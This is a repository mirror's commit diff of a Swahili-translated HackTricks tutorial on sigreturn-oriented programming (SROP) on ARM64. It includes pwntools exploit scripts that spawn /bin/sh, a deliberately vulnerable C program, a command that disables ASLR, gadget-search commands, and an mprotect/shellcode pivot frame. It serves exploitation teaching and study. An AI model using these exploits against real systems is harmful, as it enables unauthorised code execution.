maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/binary-exploitation/rop-return-oriented-programing/srop

Browse Source
This commit is contained in:
Translator 2025-08-19 20:16:29 +00:00
parent 2a56c51d93
commit 15dfd0bd81
1 changed files with 58 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
View File

@ -1,10 +1,10 @@
# SROP - ARM64 # {{#include ../../../banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}} {{#include ../../../banners/hacktricks-training.md}}
## Mfano wa Pwntools ## Mfano wa Pwntools
Mfano huu unaunda binary yenye udhaifu na kuifanya. Binary **inasoma kwenye stack** kisha inaita **`sigreturn`**: Mfano huu unaunda binary iliyo hatarini na kuifanya. Binary **inasoma kwenye stack** kisha inaita **`sigreturn`**:
```python ```python
from pwn import * from pwn import *
@ -32,7 +32,7 @@ p = process(binary.path)
p.send(bytes(frame)) p.send(bytes(frame))
p.interactive() p.interactive()
``` ```
## mfano wa bof ## bof mfano
### Msimbo ### Msimbo
```c ```c
@ -67,7 +67,7 @@ do_stuff(2);
return 0; return 0;
} }
``` ```
Kusanya na: Tunga kwa:
```bash ```bash
clang -o srop srop.c -fno-stack-protector clang -o srop srop.c -fno-stack-protector
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR
@ -103,9 +103,9 @@ payload += bytes(frame)
p.sendline(payload) p.sendline(payload)
p.interactive() p.interactive()
``` ```
## mfano wa bof bila sigreturn ## bof mfano bila sigreturn
### Msimbo ### Code
```c ```c
#include <stdio.h> #include <stdio.h>
#include <string.h> #include <string.h>
@ -171,10 +171,59 @@ Kwa maelezo zaidi kuhusu vdso angalia:
../ret2vdso.md ../ret2vdso.md
{{#endref}} {{#endref}}
Na ili kupita anwani ya `/bin/sh` unaweza kuunda mabadiliko kadhaa ya mazingira yanayolenga hiyo, kwa maelezo zaidi: Na ili kupita anwani ya `/bin/sh` unaweza kuunda mabadiliko kadhaa ya mazingira yanayorejelea hiyo, kwa maelezo zaidi:
{{#ref}} {{#ref}}
../../common-binary-protections-and-bypasses/aslr/ ../../common-binary-protections-and-bypasses/aslr/
{{#endref}} {{#endref}}
---
## Kutafuta vifaa vya `sigreturn` kiotomatiki (2023-2025)
Katika usambazaji wa kisasa, trampoline ya `sigreturn` bado inatolewa na ukurasa wa **vDSO** lakini offset halisi inaweza kutofautiana kati ya toleo la kernel na bendera za ujenzi kama BTI (`+branch-protection`) au PAC. Kuwezesha kugundua kwake kunazuia kuweka offsets kwa nguvu:
```bash
# With ROPgadget ≥ 7.4
python3 -m ROPGadget --binary /proc/$(pgrep srop)/mem --only "svc #0" 2>/dev/null | grep -i sigreturn
# With rp++ ≥ 1.0.9 (arm64 support)
rp++ -f ./binary --unique -r | grep "mov\s\+x8, #0x8b" # 0x8b = __NR_rt_sigreturn
```
Zana zote mbili zinaelewa **AArch64** encodings na zitaorodhesha mguso wa `mov x8, 0x8b ; svc #0` ambao unaweza kutumika kama *SROP gadget*.
> Kumbuka: Wakati binaries zinapoundwa na **BTI**, amri ya kwanza ya kila lengo la tawi la moja kwa moja halali ni `bti c`. `sigreturn` trampolines zilizowekwa na linker tayari zinajumuisha pad ya BTI sahihi hivyo gadget inabaki kutumika kutoka kwa msimbo usio na mamlaka.
## Kuunganisha SROP na ROP (pivot kupitia `mprotect`)
`rt_sigreturn` inatupa udhibiti wa *mifumo yote* ya usajili wa jumla na `pstate`. Mwelekeo wa kawaida kwenye x86 ni: 1) tumia SROP kuita `mprotect`, 2) pivot kwa stack mpya inayoweza kutekelezwa yenye shell-code. Wazo sawa kabisa linafanya kazi kwenye ARM64:
```python
frame = SigreturnFrame()
frame.x8 = constants.SYS_mprotect # 226
frame.x0 = 0x400000 # page-aligned stack address
frame.x1 = 0x2000 # size
frame.x2 = 7 # PROT_READ|PROT_WRITE|PROT_EXEC
frame.sp = 0x400000 + 0x100 # new pivot
frame.pc = svc_call # will re-enter kernel
```
Baada ya kutuma fremu unaweza kutuma hatua ya pili inayojumuisha shell-code safi kwenye `0x400000+0x100`. Kwa sababu **AArch64** inatumia *PC-relative* anwani hii mara nyingi ni rahisi zaidi kuliko kujenga minyororo mikubwa ya ROP.
## Uthibitishaji wa Kernel, PAC & Shadow-Stacks
Linux 5.16 ilianzisha uthibitishaji mkali wa fremu za ishara za watumiaji (commit `36f5a6c73096`). Kernel sasa inakagua:
* `uc_flags` lazima iwe na `UC_FP_XSTATE` wakati `extra_context` inapatikana.
* Neno lililotengwa katika `struct rt_sigframe` lazima liwe sifuri.
* Kila kiashiria katika rekodi ya *extra_context* kimepangwa na kinaelekeza ndani ya nafasi ya anwani ya mtumiaji.
`pwntools>=4.10` inaunda fremu zinazokidhi vigezo kiotomatiki, lakini ikiwa unazijenga kwa mikono hakikisha kuanzisha *reserved* kuwa sifuri na uondoe rekodi ya SVE isipokuwa unahitaji kweli—venginevyo `rt_sigreturn` itatoa `SIGSEGV` badala ya kurudi.
Kuanza na Android 14 na Fedora 38, userland inajengwa na **PAC** (*Pointer Authentication*) na **BTI** imewezeshwa kwa default (`-mbranch-protection=standard`). *SROP* yenyewe haijaathiriwa kwa sababu kernel inabadilisha `PC` moja kwa moja kutoka kwa fremu iliyoundwa, ikipita LR iliyothibitishwa iliyohifadhiwa kwenye stack; hata hivyo, **minyororo yoyote ya ROP inayofuata** inayofanya matawi yasiyo ya moja kwa moja lazima iruke kwenye maagizo yaliyo na BTI au anwani za PAC. Kumbuka hilo unapochagua gadgets.
Shadow-Call-Stacks zilizoanzishwa katika ARMv8.9 (na tayari zimewezeshwa kwenye ChromeOS 1.27+) ni hatua ya kupunguza kiwango cha kompyuta na *hazihusiani* na SROP kwa sababu hakuna maagizo ya kurudi yanayotekelezwa—mwelekeo wa udhibiti unahamishwa na kernel.
## Marejeleo
* [Linux arm64 signal handling documentation](https://docs.kernel.org/arch/arm64/signal.html)
* [LWN "AArch64 branch protection comes to GCC and glibc" (2023)](https://lwn.net/Articles/915041/)
{{#include ../../../banners/hacktricks-training.md}} {{#include ../../../banners/hacktricks-training.md}}